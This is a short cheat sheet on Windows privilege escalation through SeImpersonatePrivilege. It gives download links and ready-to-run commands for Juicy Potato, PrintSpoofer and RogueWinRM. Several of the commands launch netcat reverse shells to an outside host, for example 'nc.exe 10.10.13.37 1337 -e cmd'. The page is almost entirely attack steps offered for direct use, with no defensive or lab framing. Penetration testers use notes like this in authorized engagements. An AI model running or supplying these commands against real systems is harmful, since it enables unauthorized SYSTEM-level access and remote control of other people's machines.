# SeImpersonatePrivilege

If the operating system version is <= windows server 2016 use Juicy Potato else use PrintSpoofer

## Juicy Potato

Pick one CLSID from here according to your system

* <https://github.com/ohpe/juicy-potato/tree/master/CLSID>

Download the Juicy Potato binary from here

* <https://github.com/ohpe/juicy-potato/releases>

```
C:\Windows\Temp\JuicyPotato.exe -p cmd.exe -a "/c whoami > C:\Users\Public\morph3.txt" -t * -l 1031 -c {d20a3293-3341-4ae8-9aaf-8e397cb63c34}
```

## RoguePotato

I have never played with this one but should work in most of the cases&#x20;

* <https://github.com/antonioCoco/RoguePotato>
* <https://github.com/antonioCoco/RoguePotato/releases/tag/1.0>
* [https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/
  ](https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/)

## PrintSpoofer

* <https://github.com/itm4n/PrintSpoofer>
* <https://github.com/itm4n/PrintSpoofer/releases/tag/v1.0>

```
.\PrintSpoofer.exe -i -c cmd

.\PrintSpoofer.exe -c "C:\TOOLS\nc.exe 10.10.13.37 1337 -e cmd"
```

## RogueWinRM

* <https://github.com/antonioCoco/RogueWinRM>
* <https://github.com/antonioCoco/RogueWinRM/releases/tag/1.1>

```
.\RogueWinRM.exe -p C:\windows\system32\cmd.exe

.\RogueWinRM.exe -p C:\windows\temp\nc64.exe -a "10.0.0.1 3001 -e cmd"
```